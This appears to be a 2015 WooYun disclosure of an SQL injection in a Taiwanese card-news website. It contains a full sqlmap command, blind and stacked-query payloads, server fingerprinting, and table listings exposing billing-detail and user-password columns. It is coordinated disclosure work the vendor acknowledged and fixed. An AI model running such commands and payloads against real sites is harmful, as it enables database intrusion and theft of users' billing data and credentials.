当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0152988

漏洞标题:卡優新聞網某處存在sql注射漏洞(1000多萬賬單細節泄露+8萬多用戶信息泄露)(臺灣地區)

相关厂商:卡優新聞網

漏洞作者: 路人甲

提交时间:2015-11-09 14:22

修复时间:2015-12-16 06:19

公开时间:2015-12-16 06:19

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态: 已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-09: 细节已通知厂商并且等待厂商处理中
2015-11-12: 厂商已经确认,细节仅向厂商公开
2015-11-22: 细节向核心白帽子及相关领域专家公开
2015-12-02: 细节向普通白帽子公开
2015-12-12: 细节向实习白帽子公开
2015-12-16: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

卡優新聞網(CardU.com.tw)於2006年2月正式 開站,主要是提供消費者生活上所使用之各種卡類(包含有:信用卡、金融卡、儲值卡、會員卡及其他消費相關卡類)的資訊平台 ,並且以專業的新聞角度,採訪報導相關的財經、理財、金融、消費、生活、娛樂、藝文、休閒、3C…等,並且結合即時訊息、優惠 情報、資料搜尋、分析比較、市場調查、社群討論等加值服務功能,讓卡優新聞網成為一個專業的「卡優.卡油.卡友」的資訊服 務平台。

由於網路媒體儼然成為電視媒體外,第二大公眾媒 體,其接觸度及影響度,將不斷隨著使用率的擴增及習慣的養成,成為最受矚目的媒體。卡優新聞網目前不但是消費者最為仰賴的卡 資訊服務平台網站,銀行與商店所發行的各式卡資訊與好康,也都可在卡優新聞網的卡資訊、卡好康、優商店、優情報四大服務中 ,搜尋到相關的優惠活動、商品情報、銀行與商店的介紹等,讓卡優新聞網已成為消費者、商店與銀行間的完整資訊整合平台。

详细说明:

地址:http://**.**.**.**/news/detail.php?nt_pk=5&ns_pk=27830

python sqlmap.py -u "http://**.**.**.**/news/detail.php?nt_pk=5&ns_pk=27830" -p nt_pk --technique=BS --random-agent --batch  --current-user --is-dba --users --passwords --count --search -C pass


1. 账单细节(1771874+1767203+1758225+1729774+1651222+1368560+1336482+48291+43959+38960=11514550)

Database: carduweb
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| my_billing_detail                     | 1771874 |
| my_billing_detail_20150211            | 1767203 |
| msg_bank_card                         | 1758225 |
| my_billing_detail_20141028            | 1729774 |
| my_billing_detail_20140909            | 1651222 |
| my_billing_detail_20131220            | 1368560 |
| my_billing_detail_20131129            | 1336482 |
| my_billing_20141107                   | 48291   |
| my_billing                            | 43959   |
| my_billing_20141127                   | 38960   |


2. 用户信息(84559+82758+78486+78467+78431+21474=424175)

Database: carduadm
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| mng_userlog                           | 21474   |
| user_data                             | 84559   |
| user_data_20150531                    | 82758   |
| user_data_20140506                    | 78486   |
| user_data_20140505                    | 78467   |
| user_data_20140502                    | 78431   |

漏洞证明:

---
Parameter: nt_pk (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: nt_pk=5 AND 5182=5182&ns_pk=27830
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
    Payload: nt_pk=5;(SELECT * FROM (SELECT(SLEEP(5)))dmiJ)#&ns_pk=27830
---
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL 5.0.11
current user:    '[email protected].%'
current user is DBA:    False
database management system users [1]:
[*] 'stwinadm'@'192.168.88.%'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: nt_pk (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: nt_pk=5 AND 5182=5182&ns_pk=27830
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
    Payload: nt_pk=5;(SELECT * FROM (SELECT(SLEEP(5)))dmiJ)#&ns_pk=27830
---
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL 5.0.11
Database: carduadm
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| mng_userlog                           | 21474   |
| mng_prog_control                      | 2071    |
| mng_user_menu                         | 605     |
| mng_menu                              | 129     |
| mng_user_group                        | 64      |
| mng_user                              | 43      |
| mng_user_20130914                     | 28      |
| mng_user_group_email                  | 12      |
| selectitem                            | 6       |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| COLUMNS                               | 3381    |
| STATISTICS                            | 590     |
| TABLES                                | 270     |
| PARTITIONS                            | 269     |
| KEY_COLUMN_USAGE                      | 261     |
| GLOBAL_STATUS                         | 249     |
| SESSION_STATUS                        | 249     |
| GLOBAL_VARIABLES                      | 241     |
| SESSION_VARIABLES                     | 241     |
| TABLE_CONSTRAINTS                     | 220     |
| COLLATION_CHARACTER_SET_APPLICABILITY | 130     |
| COLLATIONS                            | 129     |
| SCHEMA_PRIVILEGES                     | 54      |
| CHARACTER_SETS                        | 36      |
| PLUGINS                               | 7       |
| ENGINES                               | 5       |
| SCHEMATA                              | 4       |
| PROCESSLIST                           | 2       |
| USER_PRIVILEGES                       | 1       |
| VIEWS                                 | 1       |
+---------------------------------------+---------+
Database: carduweb
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| my_billing_detail                     | 1771874 |
| my_billing_detail_20150211            | 1767203 |
| msg_bank_card                         | 1758225 |
| my_billing_detail_20141028            | 1729774 |
| my_billing_detail_20140909            | 1651222 |
| my_billing_detail_20131220            | 1368560 |
| my_billing_detail_20131129            | 1336482 |
| benfit_store_info                     | 348187  |
| content_rank_log                      | 336515  |
| benfit_store_info_20150123            | 271643  |
| content_rank_main                     | 157384  |
| user_data                             | 84559   |
| user_data_20150531                    | 82758   |
| user_data_20140506                    | 78486   |
| user_data_20140505                    | 78467   |
| user_data_20140502                    | 78431   |
| store_tag_pair                        | 60802   |
| provide_news_log                      | 59211   |
| facebook_literary                     | 58089   |
| credit_interest_content               | 48729   |
| my_billing_20141107                   | 48291   |
| my_billing                            | 43959   |
| my_billing_20141127                   | 38960   |
| news_extends                          | 36680   |
| evt_userlogin_bonus_0602_001          | 31595   |
| my_billing_20131128                   | 31383   |
| news                                  | 26849   |
| message                               | 26798   |
| news_tag_pair                         | 26215   |
| message_20140220                      | 20430   |
| news_20131017                         | 19912   |
| message_20131016                      | 19161   |
| my_billing_detail_20141126_01         | 19037   |
| store_info                            | 18852   |
| store_info_20150202                   | 18664   |
| store_info_20141229                   | 18623   |
| facebook_literary_convall             | 18602   |
| store_info_20141216                   | 18591   |
| store_info_20131107                   | 17680   |
| news_bank                             | 11804   |
| benfit_reason                         | 10287   |
| my_billing_20141107_01                | 10258   |
| benfit                                | 9892    |
| news_store_info                       | 9757    |
| my_favorite                           | 9748    |
| msg_reason                            | 9699    |
| msg_store_info                        | 8387    |
| benfit_20141128                       | 7011    |
| credit_card_pref                      | 6222    |
| store_products_photo_new              | 3934    |
| member_get_member                     | 3866    |
| news_type_tag                         | 3861    |
| user_invitation                       | 3588    |
| my_billing_detail_history             | 3275    |
| benfit_bank                           | 3058    |
| facebook_literary_conv                | 3052    |
| products_tag_pair_new                 | 2901    |
| benfit_20131025                       | 2631    |
| credit_card_func                      | 2560    |
| credit_card                           | 2505    |
| store_verify_log                      | 2446    |
| store_cross_service                   | 2308    |
| news_use_tag                          | 2186    |
| credit_card_attr                      | 2055    |
| store_products_store_new              | 2022    |
| forward_log                           | 1991    |
| benfit_store_info_history             | 1720    |
| consume_log                           | 1640    |
| my_subscription                       | 1613    |
| products_tag_pair                     | 1579    |
| evt_userbirthday_bonus_0605_001       | 1184    |
| my_calendar                           | 1099    |
| addr_book                             | 1084    |
| store_products_photo                  | 1082    |
| store_products                        | 1022    |
| store_products_new                    | 997     |
| evt_cardnu_game_2015pie_001           | 725     |
| store_type_tag                        | 663     |
| store_products_photo_20131107         | 596     |
| web_manage_count                      | 596     |
| store_use_tag                         | 584     |
| discuss                               | 562     |
| store_products_20131107               | 555     |
| invitation_template                   | 484     |
| service_question_manage               | 435     |
| recommed                              | 434     |
| web_count                             | 403     |
| city_town                             | 388     |
| city_town_vw                          | 366     |
| my_info_order                         | 333     |
| evt_userchgdata_bonus_0602_001        | 247     |
| news_org                              | 230     |
| news_history                          | 211     |
| consume_category                      | 190     |
| event_activity_status                 | 169     |
| message_history                       | 167     |
| store_info_history                    | 158     |
| benfit_tag_pair                       | 156     |
| my_billing_20141107_temp              | 155     |
| cc_store_info                         | 144     |
| preferential_tag_pair_new             | 143     |
| debit_interest_content                | 138     |
| project                               | 137     |
| evt_cardnu_game_2015pie_002           | 134     |
| benfit_history                        | 131     |
| products_tag_pair_new_history         | 118     |
| preferential_tag_pair                 | 117     |
| store_products_photo_new_history      | 116     |
| store_products_store_new_history      | 116     |
| web_notify                            | 116     |
| evt_cardnu_game_2014pie_001           | 112     |
| products_tag_pair_history             | 110     |
| store_products_history                | 109     |
| selectitem                            | 106     |
| service_question_manage_20130914      | 105     |
| store_products_photo_history          | 100     |
| benfit_type_tag                       | 85      |
| service_question_manage_history       | 85      |
| mng_user                              | 84      |
| store_claim                           | 76      |
| prepaid_card_func                     | 74      |
| store_type                            | 69      |
| benfit_use_tag                        | 68      |
| my_friends                            | 68      |
| store_type_20131107                   | 68      |
| pc_store_info                         | 67      |
| prepaid_card_pref                     | 67      |
| debit_card                            | 65      |
| store_preferential_photo_new          | 64      |
| discuss_history                       | 63      |
| store_special_tag_pair                | 59      |
| store_member_company                  | 58      |
| benfit_type_20131025                  | 55      |
| store_preferential_photo              | 55      |
| prepaid_card_attr                     | 54      |
| store_special_prod_pair               | 52      |
| debit_card_pref                       | 50      |
| store_preferential_store_new          | 50      |
| debit_card_func                       | 49      |
| preferential_tag_pair_new_history     | 47      |
| store_preferential_photo_new_history  | 47      |
| store_preferential_store_new_history  | 47      |
| preferential_tag_pair_history         | 46      |
| store_claim_history                   | 46      |
| store_preferential_history            | 46      |
| store_preferential_photo_history      | 46      |
| bank_info                             | 45      |
| bank_info_20140411                    | 44      |
| store_preferential                    | 41      |
| store_member                          | 39      |
| credit_interest                       | 37      |
| msg_type                              | 34      |
| benfit_type_history                   | 33      |
| event_manage                          | 33      |
| card_org_level                        | 31      |
| edm_manage_sendemail                  | 31      |
| news_type                             | 30      |
| event_activity                        | 27      |
| my_message                            | 27      |
| prepaid_card                          | 27      |
| prepaid_card_level                    | 25      |
| benfit_org                            | 24      |
| benfit_type                           | 24      |
| debit_interest                        | 24      |
| msg_type_20131016                     | 22      |
| store_dm_store_new                    | 22      |
| evt_cardnu_game_2014pie_002           | 21      |
| store_type_special_20131107           | 21      |
| card_func_img                         | 20      |
| member_card_func                      | 18      |
| news_type_20131112                    | 18      |
| store_type_special                    | 18      |
| member_card_pref                      | 16      |
| bank_doc                              | 12      |
| card_level                            | 12      |
| card_org                              | 12      |
| member_card_attr                      | 12      |
| member_interest                       | 12      |
| prepaid_interest_content              | 12      |
| store_dm                              | 12      |
| card_pref_img                         | 11      |
| store_dm_new                          | 11      |
| store_preferential_photo_20131107     | 10      |
| debit_card_level                      | 9       |
| store_member_history                  | 9       |
| store_preferential_new                | 9       |
| store_score_log                       | 9       |
| card_attr                             | 8       |
| msg_type_history                      | 8       |
| oil_price_now                         | 8       |
| oil_price_queue                       | 8       |
| edm_manage                            | 7       |
| member_card                           | 7       |
| member_interest_content               | 7       |
| store_service_items                   | 7       |
| event_buy_status                      | 6       |
| event_exchange_status                 | 6       |
| prepaid_attr                          | 6       |
| store_products_new_history            | 6       |
| prepaid_interest                      | 5       |
| member_attr                           | 4       |
| credit_card_history                   | 3       |
| event_buy                             | 3       |
| event_exchange                        | 3       |
| news_type_history                     | 3       |
| store_type_special_history            | 3       |
| addr_book_group                       | 2       |
| edm_manage_count                      | 2       |
| ad_manage                             | 1       |
| message_error                         | 1       |
| store_claim_20141216                  | 1       |
| store_dm_new_history                  | 1       |
| store_dm_store_new_history            | 1       |
| store_preferential_new_history        | 1       |
| user_data_history                     | 1       |
+---------------------------------------+---------+
columns LIKE 'pass' were found in the following databases:
Database: carduweb
Table: user_data_20140505
[2 columns]
+-----------------+
| Column          |
+-----------------+
| ud_password     |
| ud_password_new |
+-----------------+
Database: carduweb
Table: evt_cardnu_game_2014pie_002
[2 columns]
+-----------+
| Column    |
+-----------+
| pass_key  |
| pass_time |
+-----------+
Database: carduweb
Table: user_data_20140506
[2 columns]
+-----------------+
| Column          |
+-----------------+
| ud_password     |
| ud_password_new |
+-----------------+
Database: carduweb
Table: user_data
[2 columns]
+-----------------+
| Column          |
+-----------------+
| ud_password     |
| ud_password_new |
+-----------------+
Database: carduweb
Table: user_data_20140502
[2 columns]
+-----------------+
| Column          |
+-----------------+
| ud_password     |
| ud_password_new |
+-----------------+
Database: carduweb
Table: store_member
[2 columns]
+----------------------+
| Column               |
+----------------------+
| sm_user_password     |
| sm_user_password_new |
+----------------------+
Database: carduweb
Table: user_data_20150531
[2 columns]
+-----------------+
| Column          |
+-----------------+
| ud_password     |
| ud_password_new |
+-----------------+
Database: carduweb
Table: user_data_history
[2 columns]
+-----------------+
| Column          |
+-----------------+
| ud_password     |
| ud_password_new |
+-----------------+
Database: carduweb
Table: store_member_history
[2 columns]
+----------------------+
| Column               |
+----------------------+
| sm_user_password     |
| sm_user_password_new |
+----------------------+
Database: carduweb
Table: evt_cardnu_game_0604_001
[1 column]
+----------+
| Column   |
+----------+
| pass_key |
+----------+
Database: carduweb
Table: evt_cardnu_game_0604_002
[2 columns]
+-----------+
| Column    |
+-----------+
| pass_key  |
| pass_time |
+-----------+
Database: carduweb
Table: evt_cardnu_game_2015pie_002
[2 columns]
+-----------+
| Column    |
+-----------+
| pass_key  |
| pass_time |
+-----------+
Database: carduweb
Table: evt_cardnu_game_2015pie_001
[1 column]
+----------+
| Column   |
+----------+
| pass_key |
+----------+
Database: carduweb
Table: evt_cardnu_game_2014pie_001
[1 column]
+----------+
| Column   |
+----------+
| pass_key |
+----------+
Database: carduweb
Table: evt_cardnu_game_0604_001
[0 entries]
+----------+
| pass_key |
+----------+

修复方案:

上WAF。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:17

确认时间:2015-11-12 19:15

厂商回复:

感謝通報

最新状态:

2015-12-16:已修正